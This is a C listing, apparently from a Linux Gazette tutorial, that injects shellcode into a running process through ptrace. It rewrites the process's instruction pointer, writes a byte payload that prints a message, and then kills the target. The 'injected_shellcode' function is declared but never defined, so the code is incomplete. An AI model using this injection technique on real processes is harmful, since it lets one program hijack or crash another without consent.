ptrace (inject code)

http://linuxgazette.net/issue83/sandeep.html

#include <stdio.h>

#include <sys/ptrace.h>

#include <linux/user.h>

#include <signal.h>

#include <stdlib.h>

#include <unistd.h>

#include <string.h>

#include <sys/types.h>

#include <sys/wait.h>

void injected_shellcode();

char *shellcode;

char *mesg = 

    "\x31\xc0\xb0\x04\xeb\x0f\x31\xdb\x43\x59"

    "\x31\xd2\xb2\x0d\xcd\x80\xa1\x78\x56\x34"

    "\x12\xe8\xec\xff\xff\xff\x09\x4f\x68\x2c\x09"

    "\x43\x61\x75\x67\x68\x74\x09\x20\x0a\x0a\x21";  

    /* Prints The Message */

int Tracer(pid_t pid)

{

int error, ptr, begin, i = 0;

struct user_regs_struct data;   /* Structure to store the Registers */

if ((error = ptrace(PTRACE_ATTACH, pid, NULL, NULL))){

perror("Attach");

exit(1);

}

waitpid(pid, NULL, 0);     /* Wait for the process to stop */

if ((error = ptrace(PTRACE_GETREGS, pid, NULL, &data)))

perror("Getregs");

printf("%%eip : 0x%.8lx\n", data.eip);         /* Print the contents */

printf("%%esp : 0x%.8lx\n", data.esp);         /* of registers       */

ptr = begin = data.esp - 512;  /* Get the location to which 

        we    have to write */

printf("Inserting shellcode into %.8lx\n", (long)begin);

data.eip = (long) begin;       /* Change the Pointer */

ptrace(PTRACE_SETREGS, pid, NULL, &data);       /* Set the Registers */

while (i < strlen(shellcode)) { /* Insert the code   */

ptrace(PTRACE_POKETEXT, pid, ptr, /* to the process    */

      (int) *(int *) (shellcode + i)); /* image     */

i += 4;

ptr += 4;

}

ptrace(PTRACE_DETACH, pid, NULL, NULL); /* Detach the Process*/ 

/* Don't Forget     */

return 0;

}

int main(int argc, char **argv)

{

pid_t pid; /* Process Id        */

if (argc < 2) 

return puts("Usage:./catch pid");

pid = atoi(argv[1]);

shellcode = malloc(strlen((char *) injected_shellcode) +

  strlen(mesg) + 4);

strcpy(shellcode, (char *) injected_shellcode); /* Get message and   */

strcat(shellcode, (char *) mesg); /* code in shellcode */

printf("Mesg : trying to launch shellcode on process %d\n", pid);

sleep(1);

Tracer(pid); /* Call the tracer function */

usleep(1);

kill(pid, 9);       /* Kill the process, Optional */

wait(NULL);

return 0;

}